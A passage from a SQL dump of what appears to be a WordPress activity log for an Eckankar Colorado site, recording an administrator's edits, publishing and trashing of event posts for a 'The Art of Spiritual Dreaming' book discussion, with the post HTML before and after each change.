.249.245.x'),(215757,35591,'post_id','269137'),(215758,35591,'post_type','nf_sub'),(215759,35591,'post_title',''),(215760,35591,'_message_key','post_updated'),(215761,35591,'_server_remote_addr','66.109.210.x'),(215762,35591,'_server_http_referer','https://eckankar-colorado.org/resa-faq/satsang-class-registrations-2023-2024/'),(215763,35592,'post_id','269138'),(215764,35592,'post_type','mec-events'),(215765,35592,'post_title','BOOK DISCUSSION In Person-now called a Spiritual Discussion TEMPLATE | Title Goes Here'),(215766,35592,'_message_key','post_updated'),(215767,35592,'_user_id','2'),(215768,35592,'_user_login','S8zhaBda'),(215769,35592,'_user_email','nada@zipnadanot.org'),(215770,35592,'_server_remote_addr','76.130.120.x'),(215771,35592,'_server_http_referer','https://eckankar-colorado.org/wp-admin/edit.php?s=template&post_status=all&post_type=mec-events&action=-1&m=0&mec_start_date&mec_label=0&mec_location=0&mec_category=0&_mecnonce=a67790844f&mec%5Btitle%5D&mec%5Bcolor%5D=%23&mec%5Bdate%5D%5Bstart%5D%5Bdate%5D=10%2F03%2F2023&mec%5Bdate%5D%5Bstart%5D%5Bhour%5D=8&mec%5Bdate%5D%5Bstart%5D%5Bminutes%5D=0&mec%5Bdate%5D%5Bstart%5D%5Bampm%5D=AM&mec%5Bdate%5D%5Bend%5D%5Bdate%5D=10%2F03%2F2023&mec%5Bdate%5D%5Bend%5D%5Bhour%5D=6&mec%5Bdate%5D%5Bend%5D%5Bminutes%5D=0&mec%5Bdate%5D%5Bend%5D%5Bampm%5D=PM&mec%5Blocation_id%5D=1&mec%5Bdont_show_map%5D=1&mec%5Blocation%5D%5Bname%5D&mec%5Blocation%5D%5Baddress%5D&mec%5Blocation%5D%5Blatitude%5D&mec%5Blocation%5D%5Blongitude%5D&mec%5Borganizer_id%5D=1&mec%5Borganizer%5D%5Bname%5D&mec%5Borganizer%5D%5Btel%5D&mec%5Borganizer%5D%5Bemail%5D&mec%5Borganizer%5D%5Burl%5D&mec%5Borganizer%5D%5Bpage_label%5D&mec%5Borganizer%5D%5Bthumbnail%5D&mec%5Bcontent%5D&mec%5Bfeatured_image%5D&paged=1&action2=-1'),(215772,35593,'new_post_title','BOOK DISCUSSION In Person-now called a Spiritual Discussion TEMPLATE | Title Goes Here'),(215773,35593,'new_post_id','269138'),(215774,35593,'duplicated_post_title','BOOK DISCUSSION In Person-now called a Spiritual Discussion TEMPLATE | Title Goes Here'),(215775,35593,'duplicated_post_id','264610'),(215776,35593,'_message_key','post_duplicated'),(215777,35593,'_user_id','2'),(215778,35593,'_user_login','S8zhaBda'),(215779,35593,'_user_email','nada@zipnadanot.org'),(215780,35593,'_server_remote_addr','76.130.120.x'),(215781,35593,'_server_http_referer','https://eckankar-colorado.org/wp-admin/edit.php?s=template&post_status=all&post_type=mec-events&action=-1&m=0&mec_start_date&mec_label=0&mec_location=0&mec_category=0&_mecnonce=a67790844f&mec%5Btitle%5D&mec%5Bcolor%5D=%23&mec%5Bdate%5D%5Bstart%5D%5Bdate%5D=10%2F03%2F2023&mec%5Bdate%5D%5Bstart%5D%5Bhour%5D=8&mec%5Bdate%5D%5Bstart%5D%5Bminutes%5D=0&mec%5Bdate%5D%5Bstart%5D%5Bampm%5D=AM&mec%5Bdate%5D%5Bend%5D%5Bdate%5D=10%2F03%2F2023&mec%5Bdate%5D%5Bend%5D%5Bhour%5D=6&mec%5Bdate%5D%5Bend%5D%5Bminutes%5D=0&mec%5Bdate%5D%5Bend%5D%5Bampm%5D=PM&mec%5Blocation_id%5D=1&mec%5Bdont_show_map%5D=1&mec%5Blocation%5D%5Bname%5D&mec%5Blocation%5D%5Baddress%5D&mec%5Blocation%5D%5Blatitude%5D&mec%5Blocation%5D%5Blongitude%5D&mec%5Borganizer_id%5D=1&mec%5Borganizer%5D%5Bname%5D&mec%5Borganizer%5D%5Btel%5D&mec%5Borganizer%5D%5Bemail%5D&mec%5Borganizer%5D%5Burl%5D&mec%5Borganizer%5D%5Bpage_label%5D&mec%5Borganizer%5D%5Bthumbnail%5D&mec%5Bcontent%5D&mec%5Bfeatured_image%5D&paged=1&action2=-1'),(215782,35594,'post_id','269138'),(215783,35594,'post_type','mec-events'),(215784,35594,'post_title','The Art of Spiritual Dreaming'),(215785,35594,'post_meta_added','77'),(215786,35594,'_message_key','post_updated'),(215787,35594,'_user_id','2'),(215788,35594,'_user_login','S8zhaBda'),(215789,35594,'_user_email','nada@zipnadanot.org'),(215790,35594,'_server_remote_addr','76.130.120.x'),(215791,35594,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?action=edit&post=269138'),(215792,35595,'post_id','269138'),(215793,35595,'post_type','mec-events'),(215794,35595,'post_title','The Art of Spiritual Dreaming'),(215795,35595,'post_meta_added','77'),(215796,35595,'_message_key','post_updated'),(215797,35595,'_user_id','2'),(215798,35595,'_user_login','S8zhaBda'),(215799,35595,'_user_email','nada@zipnadanot.org'),(215800,35595,'_server_remote_addr','76.130.120.x'),(215801,35595,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?action=edit&post=269138'),(215802,35596,'post_id','269138'),(215803,35596,'post_type','mec-events'),(215804,35596,'post_title','The Art of Spiritual Dreaming'),(215805,35596,'post_meta_added','77'),(215806,35596,'_message_key','post_updated'),(215807,35596,'_user_id','2'),(215808,35596,'_user_login','S8zhaBda'),(215809,35596,'_user_email','nada@zipnadanot.org'),(215810,35596,'_server_remote_addr','76.130.120.x'),(215811,35596,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?action=edit&post=269138'),(215812,35597,'post_id','269138'),(215813,35597,'post_type','mec-events'),(215814,35597,'post_title','The Art of Spiritual Dreaming'),(215815,35597,'post_meta_added','77'),(215816,35597,'_message_key','post_updated'),(215817,35597,'_user_id','2'),(215818,35597,'_user_login','S8zhaBda'),(215819,35597,'_user_email','nada@zipnadanot.org'),(215820,35597,'_server_remote_addr','76.130.120.x'),(215821,35597,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?action=edit&post=269138'),(215822,35598,'post_id','269138'),(215823,35598,'post_type','mec-events'),(215824,35598,'post_title','The Art of Spiritual Dreaming'),(215825,35598,'post_prev_post_name',''),(215826,35598,'post_new_post_name','the-art-of-spiritual-dreaming-2'),(215827,35598,'post_prev_post_content','<div class=\"boldgrid-section\">\n<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\n<p class=\"\">&nbsp;</p>\n<p class=\"\"><span style=\"font-size: 14pt;\">Dreams touch every level of our life. They may let us glimpse the future, or give suggestions for healing, or share insights into our relationships. Above all, they can and will steer us more directly toward God.</span></p>\n<p class=\"\"><span style=\"font-size: 14pt;\">Join us for this book discussion and learn how dreams can help you gain insights from the past and future, grow in confidence, heal yourself spiritually, make decisions about your career and finances. Do this from a unique point of view: recognize the spiritual nature of your dreams.</span></p>\n<p class=\"\"><span style=\"font-size: 14pt;\">Your life is the canvas. You are the artist. Paint a more fulfilling life for yourself using Harold Klemp\'s proven techniques in The Art of Spiritual Dreaming.</span></p>\n<span style=\"font-size: 14pt;\">You can purchase his books at your local ECK Center, through many online bookstores like Amazon, or order from the <a href=\"https://www.eckbooks.org/items/The_Art_of_Spiritual_Dreaming-81-0.html\">ECK Bookstore</a>.</span></div>\n<div></div>\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\n</div>\n</div>\n</div>\n</div>'),(215828,35598,'post_new_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">&nbsp;</p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Dreams touch every level of our life. They may let us glimpse the future, or give suggestions for healing, or share insights into our relationships. Above all, they can and will steer us more directly toward God.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Join us for this book discussion and learn how dreams can help you gain insights from the past and future, grow in confidence, heal yourself spiritually, make decisions about your career and finances. Do this from a unique point of view: recognize the spiritual nature of your dreams.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Your life is the canvas. You are the artist. Paint a more fulfilling life for yourself using Harold Klemp\'s proven techniques in The Art of Spiritual Dreaming.</span></p>\r\n<span style=\"font-size: 14pt;\">You can purchase his books at your local ECK Center, through many online bookstores like Amazon, or order from the <a href=\"https://www.eckbooks.org/items/The_Art_of_Spiritual_Dreaming-81-0.html\">ECK Bookstore</a>.</span></div>\r\n<div></div>\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(215829,35598,'post_prev_post_status','draft'),(215830,35598,'post_new_post_status','publish'),(215831,35598,'post_prev_post_date','2023-10-02 12:37:53'),(215832,35598,'post_new_post_date','2023-10-02 12:43:27'),(215833,35598,'post_prev_post_date_gmt','0000-00-00 00:00:00'),(215834,35598,'post_new_post_date_gmt','2023-10-02 18:43:27'),(215835,35598,'post_new_thumb_id','268966'),(215836,35598,'post_new_thumb_title','spiritual-dreaming-book-1'),(215837,35598,'_message_key','post_updated'),(215838,35598,'_user_id','2'),(215839,35598,'_user_login','S8zhaBda'),(215840,35598,'_user_email','nada@zipnadanot.org'),(215841,35598,'_server_remote_addr','76.130.120.x'),(215842,35598,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?action=edit&post=269138'),(215843,35599,'post_id','269138'),(215844,35599,'post_type','mec-events'),(215845,35599,'post_title','The Art of Spiritual Dreaming'),(215846,35599,'post_prev_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">&nbsp;</p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Dreams touch every level of our life. They may let us glimpse the future, or give suggestions for healing, or share insights into our relationships. Above all, they can and will steer us more directly toward God.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Join us for this book discussion and learn how dreams can help you gain insights from the past and future, grow in confidence, heal yourself spiritually, make decisions about your career and finances. Do this from a unique point of view: recognize the spiritual nature of your dreams.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Your life is the canvas. You are the artist. Paint a more fulfilling life for yourself using Harold Klemp\'s proven techniques in The Art of Spiritual Dreaming.</span></p>\r\n<span style=\"font-size: 14pt;\">You can purchase his books at your local ECK Center, through many online bookstores like Amazon, or order from the <a href=\"https://www.eckbooks.org/items/The_Art_of_Spiritual_Dreaming-81-0.html\">ECK Bookstore</a>.</span></div>\r\n<div></div>\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(215847,35599,'post_new_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">&nbsp;</p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Dreams touch every level of our life. They may let us glimpse the future, or give suggestions for healing, or share insights into our relationships. Above all, they can and will steer us more directly toward God.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Join us for this book discussion and learn how dreams can help you gain insights from the past and future, grow in confidence, heal yourself spiritually, make decisions about your career and finances. Do this from a unique point of view: recognize the spiritual nature of your dreams.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Your life is the canvas. You are the artist. Paint a more fulfilling life for yourself using Harold Klemp\'s proven techniques in The Art of Spiritual Dreaming.</span></p>\r\n<p><span style=\"font-size: 14pt;\">You can purchase his books at your local ECK Center, through many online bookstores like Amazon, or order from the <a href=\"https://www.eckbooks.org/items/The_Art_of_Spiritual_Dreaming-81-0.html\">ECK Bookstore</a>.</span></p>\r\n</div>\r\n<div></div>\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(215848,35599,'post_prev_post_status','publish'),(215849,35599,'post_new_post_status','draft'),(215850,35599,'_message_key','post_updated'),(215851,35599,'_user_id','2'),(215852,35599,'_user_login','S8zhaBda'),(215853,35599,'_user_email','nada@zipnadanot.org'),(215854,35599,'_server_remote_addr','76.130.120.x'),(215855,35599,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269138&action=edit'),(215856,35600,'post_id','269138'),(215857,35600,'post_type','mec-events'),(215858,35600,'post_title','The Art of Spiritual Dreaming'),(215859,35600,'post_new_thumb_id','268966'),(215860,35600,'post_new_thumb_title','spiritual-dreaming-book-1'),(215861,35600,'post_meta_added','77'),(215862,35600,'_message_key','post_updated'),(215863,35600,'_user_id','2'),(215864,35600,'_user_login','S8zhaBda'),(215865,35600,'_user_email','nada@zipnadanot.org'),(215866,35600,'_server_remote_addr','76.130.120.x'),(215867,35600,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269138&action=edit'),(215868,35601,'post_id','268965'),(215869,35601,'post_type','mec-events'),(215870,35601,'post_title','The Art of Spiritual Dreaming'),(215871,35601,'post_prev_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 16pt;\">Join us for this Spiritual Discussion based on the book - </span><span style=\"font-size: 16pt;\"><em>The Art of Spiritual Dreaming&nbsp;</em></span></strong><span style=\"font-size: 16pt;\"> —by Harold Klemp<br>\r\n</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Harold Klemp’s inspiring and practical approach to spirituality helps many thousands of people worldwide find greater freedom, wisdom, and love in their lives.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">His wisdom and heart-opening stories of everyday people having extraordinary experiences tell of a secret truth at work in your life–there is divine purpose and meaning to every experience you have. Every single moment of your life is the handiwork of a higher cause. And you can know what it is. Hint: God’s love is the key, and spiritual freedom is the goal.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">This book discussion class begins on Sunday, October 1, 2023 at 10:30 am</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">You can purchase his books at your local ECK Center, through many online bookstores like Amazon, or order from the <a href=\"https://www.eckbooks.org/items/-81-0.html\" target=\"_blank\" rel=\"noopener\">ECK Bookstore</a>.</span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(215872,35601,'post_new_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 16pt;\">Join us for this Spiritual Discussion based on the book - </span><span style=\"font-size: 16pt;\"><em>The Art of Spiritual Dreaming&nbsp;</em></span></strong><span style=\"font-size: 16pt;\"> —by Harold Klemp<br>\r\n</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Dreams touch every level of our life. They may let us glimpse the future, or give suggestions for healing, or share insights into our relationships. Above all, they can and will steer us more directly toward God.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Join us for this book discussion and learn how dreams can help you gain insights from the past and future, grow in confidence, heal yourself spiritually, make decisions about your career and finances. Do this from a unique point of view: recognize the spiritual nature of your dreams.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Your life is the canvas. You are the artist. Paint a more fulfilling life for yourself using Harold Klemp\'s proven techniques in The Art of Spiritual Dreaming.</span></p>\r\n<span class=\"\" style=\"font-size: 14pt;\">This book discussion class will be held on every first Sunday at 10:30pm. </span></div>\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\"><span class=\"\" style=\"font-size: 14pt;\"><br>\r\n</span>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">You can purchase this book at your local ECK Center, through many online bookstores like Amazon, or order from the <a href=\"https://www.eckbooks.org/items/-81-0.html\" target=\"_blank\" rel=\"noopener\">ECK Bookstore</a>.</span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(215873,35601,'_message_key','post_updated'),(215874,35601,'_user_id','2'),(215875,35601,'_user_login','S8zhaBda'),(215876,35601,'_user_email','nada@zipnadanot.org'),(215877,35601,'_server_remote_addr','76.130.120.x'),(215878,35601,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=268965&action=edit'),(215879,35602,'post_id','268965'),(215880,35602,'post_type','mec-events'),(215881,35602,'post_title','The Art of Spiritual Dreaming'),(215882,35602,'post_prev_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 16pt;\">Join us for this Spiritual Discussion based on the book - </span><span style=\"font-size: 16pt;\"><em>The Art of Spiritual Dreaming&nbsp;</em></span></strong><span style=\"font-size: 16pt;\"> —by Harold Klemp<br>\r\n</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Dreams touch every level of our life. They may let us glimpse the future, or give suggestions for healing, or share insights into our relationships. Above all, they can and will steer us more directly toward God.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Join us for this book discussion and learn how dreams can help you gain insights from the past and future, grow in confidence, heal yourself spiritually, make decisions about your career and finances. Do this from a unique point of view: recognize the spiritual nature of your dreams.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Your life is the canvas. You are the artist. Paint a more fulfilling life for yourself using Harold Klemp\'s proven techniques in The Art of Spiritual Dreaming.</span></p>\r\n<span class=\"\" style=\"font-size: 14pt;\">This book discussion class will be held on every first Sunday at 10:30pm. </span></div>\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\"><span class=\"\" style=\"font-size: 14pt;\"><br>\r\n</span>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">You can purchase this book at your local ECK Center, through many online bookstores like Amazon, or order from the <a href=\"https://www.eckbooks.org/items/-81-0.html\" target=\"_blank\" rel=\"noopener\">ECK Bookstore</a>.</span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(215883,35602,'post_new_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 16pt;\">Join us for this Spiritual Discussion based on the book - </span><span style=\"font-size: 16pt;\"><em>The Art of Spiritual Dreaming&nbsp;</em></span></strong><span style=\"font-size: 16pt;\"> —by Harold Klemp<br>\r\n</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Dreams touch every level of our life. They may let us glimpse the future, or give suggestions for healing, or share insights into our relationships. Above all, they can and will steer us more directly toward God.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Join us for this book discussion and learn how dreams can help you gain insights from the past and future, grow in confidence, heal yourself spiritually, make decisions about your career and finances. Do this from a unique point of view: recognize the spiritual nature of your dreams.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Your life is the canvas. You are the artist. Paint a more fulfilling life for yourself using Harold Klemp\'s proven techniques in <em>The Art of Spiritual Dreaming</em>.</span></p>\r\n<p class=\"\"><span class=\"\" style=\"font-size: 14pt;\">This book discussion class will be held on every first Sunday at 10:30pm. </span></p>\r\n</div>\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p><span class=\"\" style=\"font-size: 14pt;\">&nbsp;</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">You can purchase this book at your local ECK Center, through many online bookstores like Amazon, or order from the <a href=\"https://www.eckbooks.org/items/-81-0.html\" target=\"_blank\" rel=\"noopener\">ECK Bookstore</a>.</span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(215884,35602,'_message_key','post_updated'),(215885,35602,'_user_id','2'),(215886,35602,'_user_login','S8zhaBda'),(215887,35602,'_user_email','nada@zipnadanot.org'),(215888,35602,'_server_remote_addr','76.130.120.x'),(215889,35602,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=268965&action=edit'),(215890,35603,'post_id','268965'),(215891,35603,'post_type','mec-events'),(215892,35603,'post_title','The Art of Spiritual Dreaming'),(215893,35603,'post_prev_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 16pt;\">Join us for this Spiritual Discussion based on the book - </span><span style=\"font-size: 16pt;\"><em>The Art of Spiritual Dreaming&nbsp;</em></span></strong><span style=\"font-size: 16pt;\"> —by Harold Klemp<br>\r\n</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Dreams touch every level of our life. They may let us glimpse the future, or give suggestions for healing, or share insights into our relationships. Above all, they can and will steer us more directly toward God.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Join us for this book discussion and learn how dreams can help you gain insights from the past and future, grow in confidence, heal yourself spiritually, make decisions about your career and finances. Do this from a unique point of view: recognize the spiritual nature of your dreams.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Your life is the canvas. You are the artist. Paint a more fulfilling life for yourself using Harold Klemp\'s proven techniques in <em>The Art of Spiritual Dreaming</em>.</span></p>\r\n<p class=\"\"><span class=\"\" style=\"font-size: 14pt;\">This book discussion class will be held on every first Sunday at 10:30pm. </span></p>\r\n</div>\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p><span class=\"\" style=\"font-size: 14pt;\">&nbsp;</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">You can purchase this book at your local ECK Center, through many online bookstores like Amazon, or order from the <a href=\"https://www.eckbooks.org/items/-81-0.html\" target=\"_blank\" rel=\"noopener\">ECK Bookstore</a>.</span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(215894,35603,'post_new_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 16pt;\">Join us for this Spiritual Discussion based on the book - </span><span style=\"font-size: 16pt;\"><em>The Art of Spiritual Dreaming&nbsp;</em></span></strong><span style=\"font-size: 16pt;\"> —by Harold Klemp<br>\r\n</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Dreams touch every level of our life. They may let us glimpse the future, or give suggestions for healing, or share insights into our relationships. Above all, they can and will steer us more directly toward God.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Join us for this book discussion and learn how dreams can help you gain insights from the past and future, grow in confidence, heal yourself spiritually, make decisions about your career and finances. Do this from a unique point of view: recognize the spiritual nature of your dreams.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Your life is the canvas. You are the artist. Paint a more fulfilling life for yourself using Harold Klemp\'s proven techniques in <em>The Art of Spiritual Dreaming</em>.</span></p>\r\n<p class=\"\"><span class=\"\" style=\"font-size: 14pt;\">This book discussion class will be held every first Sunday at 10:30pm. </span></p>\r\n</div>\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p><span class=\"\" style=\"font-size: 14pt;\">&nbsp;</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">You can purchase this book at your local ECK Center, through many online bookstores like Amazon, or order from the <a href=\"https://www.eckbooks.org/items/-81-0.html\" target=\"_blank\" rel=\"noopener\">ECK Bookstore</a>.</span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(215895,35603,'_message_key','post_updated'),(215896,35603,'_user_id','2'),(215897,35603,'_user_login','S8zhaBda'),(215898,35603,'_user_email','nada@zipnadanot.org'),(215899,35603,'_server_remote_addr','76.130.120.x'),(215900,35603,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=268965&action=edit'),(215901,35604,'post_id','268965'),(215902,35604,'post_type','mec-events'),(215903,35604,'post_title','The Art of Spiritual Dreaming'),(215904,35604,'post_prev_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 16pt;\">Join us for this Spiritual Discussion based on the book - </span><span style=\"font-size: 16pt;\"><em>The Art of Spiritual Dreaming&nbsp;</em></span></strong><span style=\"font-size: 16pt;\"> —by Harold Klemp<br>\r\n</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Dreams touch every level of our life. They may let us glimpse the future, or give suggestions for healing, or share insights into our relationships. Above all, they can and will steer us more directly toward God.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Join us for this book discussion and learn how dreams can help you gain insights from the past and future, grow in confidence, heal yourself spiritually, make decisions about your career and finances. Do this from a unique point of view: recognize the spiritual nature of your dreams.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Your life is the canvas. You are the artist. Paint a more fulfilling life for yourself using Harold Klemp\'s proven techniques in <em>The Art of Spiritual Dreaming</em>.</span></p>\r\n<p class=\"\"><span class=\"\" style=\"font-size: 14pt;\">This book discussion class will be held every first Sunday at 10:30pm. </span></p>\r\n</div>\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p><span class=\"\" style=\"font-size: 14pt;\">&nbsp;</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">You can purchase this book at your local ECK Center, through many online bookstores like Amazon, or order from the <a href=\"https://www.eckbooks.org/items/-81-0.html\" target=\"_blank\" rel=\"noopener\">ECK Bookstore</a>.</span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(215905,35604,'post_new_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 16pt;\">Join us for this Spiritual Discussion based on the book - </span><span style=\"font-size: 16pt;\"><em>The Art of Spiritual Dreaming&nbsp;</em></span></strong><span style=\"font-size: 16pt;\"> —by Harold Klemp<br>\r\n</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Dreams touch every level of our life. They may let us glimpse the future, or give suggestions for healing, or share insights into our relationships. Above all, they can and will steer us more directly toward God.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Join us for this book discussion and learn how dreams can help you gain insights from the past and future, grow in confidence, heal yourself spiritually, make decisions about your career and finances. Do this from a unique point of view: recognize the spiritual nature of your dreams.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Your life is the canvas. You are the artist. Paint a more fulfilling life for yourself using Harold Klemp\'s proven techniques in <em>The Art of Spiritual Dreaming</em>.</span></p>\r\n<p class=\"\"><span class=\"\" style=\"font-size: 14pt;\">This book discussion class will be held every first Sunday at 10:30pm. </span></p>\r\n</div>\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><span class=\"\" style=\"font-size: 14pt;\">&nbsp;</span><span style=\"font-size: 14pt;\">You can purchase this book at your local ECK Center, through many online bookstores like Amazon, or order from the <a href=\"https://www.eckbooks.org/items/-81-0.html\" target=\"_blank\" rel=\"noopener\">ECK Bookstore</a>.</span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(215906,35604,'_message_key','post_updated'),(215907,35604,'_user_id','2'),(215908,35604,'_user_login','S8zhaBda'),(215909,35604,'_user_email','nada@zipnadanot.org'),(215910,35604,'_server_remote_addr','76.130.120.x'),(215911,35604,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=268965&action=edit'),(215912,35605,'post_id','269138'),(215913,35605,'post_type','mec-events'),(215914,35605,'post_title','The Art of Spiritual Dreaming'),(215915,35605,'_message_key','post_trashed'),(215916,35605,'_user_id','2'),(215917,35605,'_user_login','S8zhaBda'),(215918,35605,'_user_email','nada@zipnadanot.org'),(215919,35605,'_server_remote_addr','76.130.120.x'),(215920,35605,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269138&action=edit'),(215921,35606,'post_id','269140'),(215922,35606,'post_type','mec-events'),(215923,35606,'post_title','MEETUP TEMPLATE-In Person or Online-Now Called a Spiritual Discussion | Title Goes 